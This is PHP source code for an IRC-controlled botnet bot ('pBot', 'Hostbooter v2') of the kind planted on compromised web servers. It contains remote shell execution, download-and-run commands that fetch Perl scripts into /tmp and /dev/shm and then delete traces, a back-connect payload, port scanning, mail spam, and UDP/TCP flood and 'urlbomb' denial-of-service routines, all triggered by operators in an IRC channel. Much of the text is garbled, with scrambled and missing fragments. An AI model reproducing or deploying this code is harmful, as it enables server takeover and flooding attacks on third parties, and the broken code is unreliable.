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set_time_limit( 0 ); error_reporting( 0 ); echo "Success!"; class pBot { var $using_encode = true; var $config = array( 'server' => 'Q2VudHVyaS5JUkMuV29ybGRuZXQuTmV0DQo=', //server here (base64) 'port' => 6667, 'chan' => 'YmVhc3QNCg==', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy" 'key' => '', 'nickform' => '[SCAN][%d]', 'identp' => 'ez', 'modes' => '+p', 'maxrand' => 6, 'cprefix' => '.', 'host' => '' ); var $admins = array ( 'cbz' => 'YmVhc3QNCg==', // pass = "beast" 'c``' => 'YmVhc3QNCg==', // pass = "beast" //passes are MD5 format, you can also have multiple admins ); function auth_host( $nick, $password, $host ) { $admin_count = count( $this->admins ); if( $admin_count > 0 ) { $mpass = md5( $password ); if( $this->admins[ $nick ] == $mpass ) { $this->users[ $host ] = true; } } else { $this->users[ $host ] = true; } } function is_authed( $host ) { return isset( $this->users[ $host ] );

} function remove_auth( $host ) { unset( $this->users[ $host ] ); } function ex( $cfe ) { $res = ''; if (!empty($cfe)) { if(function_exists('class_exists') && class_exists('Perl')) { $perl = new Perl(); $perl->eval( "system('$cfe');" ); } if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('proc_open')) { $res = proc_open($cfe); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function is_safe( ) { if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) )



return 0; } return 1;

function get_chan( ) { if( $this->using_encode ) { return '#'.base64_decode( $this->config[ 'chan' ] ); } else { return '#'.$this->config[ 'chan' ]; } } function start() { if( $this->using_encode ) { if(!($this->conn = fsockopen(base64_decode($this>config['server']),$this->config['port'],$e,$s,30))) { $this->start(); } } else { if(!($this->conn = fsockopen($this->config['server'],$this>config['port'],$e,$s,30))) { $this->start(); } } $ident = $this->config['prefix']; $alph = range("0","9"); for( $i=0; $i < $this->config['maxrand']; $i++ ) { $ident .= $alph[rand(0,9)]; } if( strlen( $this->config[ 'pass' ] ) > 0 ) { $this->send( "PASS ".$this->config[ 'pass' ] ); } $this->send("USER ".$ident." localhost :".php_uname().""); $this->set_nick( ); $this->main( ); } function main() { while(!feof($this->conn))



$this->buf = trim(fgets($this->conn,512)); $cmd = explode(" ",$this->buf); if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] =="001") { $this->send("MODE ".$this->nick." ".$this-

if( $this->using_encode ) { $this->join($this->get_chan( ), base64_decode($this->config['key'])); $this->privmsg($this->get_chan( ),"Hostbooter v2 Online!"); $server_name = $_SERVER['SERVER_NAME']; $req_uri = $_SERVER['REQUEST_URI']; $vuln = "http://".$server_name.$req_uri; $this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln ); } else { $this->join($this->get_chan( ),$this>config['key']); } if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } else { $safemode = "off"; } $uname = php_uname(); } if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf," :"),2); $msgcmd = explode(" ",$msg); $nick = explode("!",$cmd[0]); $vhost = explode("@",$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i
} if(count($cmd)>2) { switch($cmd[1]) { case "QUIT": { if( $this->is_authed( $host ) ) { $this->remove_auth( $host ); } } break; case "PART": { if( $this->is_authed( $host ) ) { $this->remove_auth( $host ); } } break; case "PRIVMSG": if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) ) { if( $this->is_authed( $host ) == false ) { switch( substr( $mcmd[ 0 ], 1 ) ) { case "login": { $this>auth_host( $nick, $mcmd[ 1 ], $host ); if( $this>is_authed( $host ) ) { $this>privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] ".$nick." logged in!\3]"); $this>privmsg( $this->get_chan( ), exec('uptime')); } else { $this>privmsg( $this->get_chan( ), "[\3" . "4[\2Warning!\2] Incorrect Login from ".$nick."!\3]"); } break; } } } else {

switch(substr($mcmd[0],1)) {

case "exec": { if( !$this-

>is_safe( ) )


$command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 ); $returndata = $this->ex( $command ); if( !

empty( $returndata ) )

{ $this->privmsg( $this->get_chan( ), '[ exec ] '.$returndata );

} } break;

} case "info": { $safemode = "on";

if( !$this-

>is_safe( ) )


$safemode = "off"; } $this>privmsg( $this->get_chan( ), "\3" . "4.php_uname( ) (SAFE: .$safemode.)\3]"); break; } case "safe": { $safemode = "on"; if( !$this>is_safe( ) ) { $safemode = "off"; } $this>privmsg( $this->get_chan( ), "[\3" . "4Safe Mode is \2$safemode\2\3]"); break; } case "mail": //mail to from subject message if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]) ,$header,$times)) { $this->privmsg( $this->get_chan( ), "[\2MAIL\2]: Unable to send email.");

} else { $this->privmsg( $this->get_chan( ), "[\2MAIL\2]: Sent emails to $times people\2".$mcmd[1]."\2"); } break; } case "uname": { $this>privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) ); break; } case "back": { $this>privmsg( $this->get_chan( ), exec('cd /tmp;lwp-download reme/bc.txt;perl bc.txt 3071')); $this>privmsg( $this->get_chan( ), "[\3" . "4Connecting to \2Snipa\2\3]"); } case "dropperl": { if( $this>is_safe( ) ) { $this>privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' ); break; } $perl_file =


if( !empty( $perl_file ) )


$parsed_url = $this->parse_url_s( $perl_file ); $new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ]. $parsed_url[ 'dir' ].'/'; $new_local

= $parsed_url[ 'file' ];


= $parsed_url[ 'file_ext' ]; $this-

>ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); >ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');


$this>ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf

*'.$file_type.'*'); $this>ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); $this>ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); $this>ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); $this>ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); $this>ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); $this>ex('cd /tmp;rm -rf *'.$file_type.'**'); $this>ex('cd /dev/shm;rm -rf *'.$file_type.'**'); $this-

>privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$new_remote.$new_local );

break; }

$this>privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file ); break; } case "ip": { $this>privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] ); break; } case "execrfi": { $fileUrl = $mcmd[1]; if( !empty( $fileUrl ) ) = parse_url( $fileUrl );

{ $urli

if( ! empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) ) { $fp = fsockopen( $urli['host'], 80, $errno, $errstr, 5 ); if( $fp ) {

$out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n"; $out .= "Host: ".$urli['host']."\r\n"; $out .= "Keep-Alive: 300\r\n"; $out .= "Connection: keep-alive\r\n\r\n"; fwrite( $fp, $out ); $get_data = ''; while(!feof($fp)) { $get_data .= fgets( $fp, 256 ); } $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$fileUrl ); break; } }


$this>privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl ); break; } case "base64": { $str_ed = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 ); switch( $mcmd[1] ) { case "encode": { $this->privmsg( $this->get_chan( ), "[ base64 ] encode [ '".$str_ed."' -> '".base64_encode($str_ed)."' ]" ); break; } case "decode":


$this->privmsg( $this->get_chan( ), "[ base64 ] decode [ '".$str_ed."' -> '".base64_decode($str_ed)."' ]" ); break;

} }

break; } case "md5": { $str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );

$this>privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ] " ); break; } case "dns": { if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]);

if(count($ip)==4 &&

is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))


$this>privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); } else { $this>privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; } case "die": { fclose( $this->conn ); exit( ); break; } case "restart": { $this>privmsg( $this->get_chan( ), "[ restart ] executed by [".$nick."]" ); $this->send( "QUIT :restart command from ".$nick ); fclose( $this->conn ); $this>start(); break; } case "breaksafe": { if( $this>is_safe( ) ) {

ini_restore( "safe_mode" ); ini_restore( "open_basedir" );

} $safemode =


if( !$this-

>is_safe( ) )


$safemode = "off"; $this-


} $this>privmsg( $this->get_chan( ), '[ safe ] '.$safemode );

$mcmd ) > 3 )

} case "moveserver": { if( count( {

$server = $mcmd[1];


= $mcmd[2]; $channel = $mcmd[3];

$key =

$mcmd[4]; $this->using_encode )

if( {

$this->config[ 'server' ] = base64_encode( $server ); $this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) ); $this->config[ 'key' ] = base64_encode( $key );

} else {

$this->config[ 'server' ] = $server; $this->config[ 'chan' ] = str_replace( "#", "", $channel ); $this->config[ 'key' ] = $key; } >config[ 'port' ] = $port; >privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." => ".$channel." => ".$key );


$this>send( "QUIT :moveserver command from ".$nick ); fclose( $this->conn ); $this-


} break; } case "whois": { $param2 = $mcmd[1]; $param2 ) )

if( !empty( {


it //

$fp =

fsockopen( "", 80, $errno, $errstr, 30 ); if(

$fp )

{ $out = "GET /?queryinput=$param2 HTTP/1.1\r\n"; $out .= "Host:\r\n"; $out .= "Keep-Alive: 300\r\n"; $out .= "Connection: keep-alive\r\n\r\n"; fwrite( $fp, $out ); $whodata = ''; while(!feof($fp)) { /*do nothing*/ $whodata .= fread( $fp, 1024 ); } $explk = explode( "
", $whodata ); $explk = explode( "
", $explk[1] ); $htmldat = strip_tags( $explk[0] );

fclose( $fp ); $this->privmsg( $this->get_chan( ), "[ whois ] $htmldat" ); }else{ $this->privmsg( $this->get_chan( ), "[ whois ] Error: $errstr" );


} else {

$this>privmsg( $this->get_chan( ), "[ whois ] Invalid params, use .whois " ); } break; } case "upftp": { //ftp://user:[email protected] parse_url( $mcmd[1] ); $mcmd[2]; $mcmd[3];

$pftp = $file = $dest = if( empty(

$pftp[ 'host' ] )


empty( $pftp[ 'user' ] )


empty( $pftp[ 'pass' ] )


empty( $file ) empty( $dest ) )

|| { $this-

>privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" ); } else { $conn_id = ftp_connect( $pftp[ 'host' ] );

$login_result = ftp_login( $conn_id, $pftp[ 'user' ], $pftp[ 'pass' ] ); ( !$conn_id ) || ( !$login_result ) )

if( {

$this->privmsg( $this->get_chan( ), "[ upftp ] FTP connection failed!" ); } else

{ $this->privmsg( $this->get_chan( ), "[ upftp ] Connected to ".$pftp[ 'host' ]." for user ".$pftp[ 'user' ] ); $upload = ftp_put( $conn_id, $dest, $file, FTP_BINARY ); if( !$upload ) { $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload faled!" ); } else { $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload success!" ); $this->privmsg( $this->get_chan( ), "[ upftp ] Uploaded '".$file."' to '".$dest."'" ); } } } break;


} case "joinchan": { $channel = $key =

$mcmd[2]; >privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." => ".$key ); $channel, $key );

>privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] ); "PART ".$mcmd[1] );


break; } case "partchan": { $this$this->send( } case "wako":

{ $this->privmsg( $this->get_chan( ), "Wako = RANDOM" ); break; } case "getvuln": {

$server_name = $_SERVER['SERVER_NAME'];

$req_uri =


$server_name != "localhost" && $server_name != "" )

{ strlen( $server_name ) && strlen( $req_uri ) )

if( {

$vuln = "http://".$server_name.$req_uri; $this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln ); } } break;

$mcmd ) > 2 )

} case "download": { if( count( {

$fp = fopen( $mcmd[ 2 ], "w" ) )

if( ! {

$this->privmsg( $this->get_chan( ), "[ download ] Permission denied!" ); } else { if( !$get = file( $mcmd[ 1 ] ) ) { $this->privmsg( $this->get_chan( ), "[ download ] Download failed!" ); } else { for( $i=0; $i <= count( $get ); $i++ ) { fwrite( $fp, $get[ $i ] ); } $this->privmsg( $this->get_chan( ),"[ download ] URL [".$mcmd[ 1 ]."] to [".$mcmd[ 2 ]."]"); }

fclose( $fp );

} } else {

$this>privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" ); } break; } case "pmsg": { $person = $mcmd[1]; $text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 ); $this>privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text ); $this>privmsg( $person, $text ); break; } case "pscan": { $host = $mcmd[1]; $beginport = $mcmd[2]; $endport = $mcmd[3]; $open_ports = "Open Port List for ".$host.": "; for($i = $beginport; $i < $endport; $i++)

{ if(

$this->scanport( $host, $i ) )

{ $open_ports .= "|".$i;

} }

>privmsg( $this->get_chan( ), $open_ports );

>privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] );

$thisbreak; } case "software": { $thisbreak; } case "snf": { $this-

>config[ 'nickform' ] = $mcmd[ 1 ]; $this>privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." ]" ); break; } case "randnick": { $this>set_nick(); break; } case "logout": { $this>remove_auth( $host ); $this>privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] Goodbye, ".$nick.".\3]"); break; } case "urlbomb": { $this>urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] ); break; } case "udpflood": { if( count( $mcmd ) > 3 ) { $this>udpflood($mcmd[1],$mcmd[2],$mcmd[3]); } break; } case "tcpflood": { if( count( $mcmd ) > 5 ) { $this>tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } } break; } } } $old_buf = $this->buf; } $this->start(); } function scanport( $host, $port )



if( fsockopen( $host, $port, $e, $s ) ) { return 1; } return 0;

function urlbomb( $host, $path, $times, $mode = 0 ) { if( !isset( $host ) || !isset( $path ) || !isset( $times ) ) return; $this->privmsg( $this->get_chan( ), "\3" . "4[UrlBomb] \2Started!\2 [ ".$host."/".$path." ]\3"); $success = 0; for( $i = 0; $i < $times; $i++ ) { $fp = fsockopen( $host, 80, $errno, $errstr, 30 ); if( $fp ) { $out = "GET /".$path." HTTP/1.1\r\n"; $out .= "Host: ".$host."\r\n"; $out .= "Keep-Alive: 300\r\n"; $out .= "Connection: keep-alive\r\n\r\n"; fwrite( $fp, $out ); if( $mode != 0 ) { while(!feof($fp)){/*do nothing*/} } fclose( $fp ); $success++; }


$this->privmsg( $this->get_chan( ), "\3" . "4[UrlBomb] \2Finished!\2 [".$host."/".$path." ][ Number of Times Visited: ".$success." ]\3"); } function udpflood( $host, $packetsize, $time ) { $this->privmsg( $this->get_chan( ),"\3" . "4[UdpFlood-DDoZ] \2Started!\2 [Fl00ding \2".$host."\2 with \2".$packetsize."\2 Packets for \2".$time."\2 Seconds!]\3"); $packet = ""; for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++;

} $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg( $this->get_chan( ),"\3" . "4[UdpFlood-DDoZ] \2Finished!\2 [Sent $env MBs / Speed $vel MB/s]\3"); } function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256));

Error: <$e>");

for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]: } else {

return 0;

fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]: Config - $packets for $host:$port."); } function send($msg) { fwrite($this->conn,"$msg\r\n"); } function join($chan,$key=NULL) { $this->send("JOIN $chan $key"); } function privmsg($to,$msg) { $this->send("PRIVMSG $to :$msg"); } function notice($to,$msg) { $this->send("NOTICE $to :$msg"); } function set_nick() {

$prefix = "[C]"; if(isset($_SERVER['SERVER_SOFTWARE'])) { if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ),

"apache" ) )

$prefix = "[UnixX]"; elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "iis" ) ) ] ), "xitami" ) )

$prefix = "[I]"; elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' else


$prefix = "[X]"; $prefix = "[U]";

if( !$this->is_safe( ) ) { $prefix .= "[S]"; } $random_number = ""; for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ ) { $random_number .= mt_rand( 0, 9 ); } $random_number ); }

$this->nick = sprintf( $prefix.$this->config[ 'nickform' ], $this->send("NICK ".$this->nick);

function parse_url_s( $url ) { $URLpcs = ( parse_url( $url ) ); $PathPcs = explode( "/", $URLpcs['path'] ); $URLpcs['file'] = end( $PathPcs ); unset( $PathPcs[ key( $PathPcs ) ] ); $URLpcs['dir'] = implode("/",$PathPcs); $fileext = explode( '.', $URLpcs['file'] ); if(count($fileext)) { $URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ]; } }

return ($URLpcs);

} $bot = new pBot; $bot->start(); ?>

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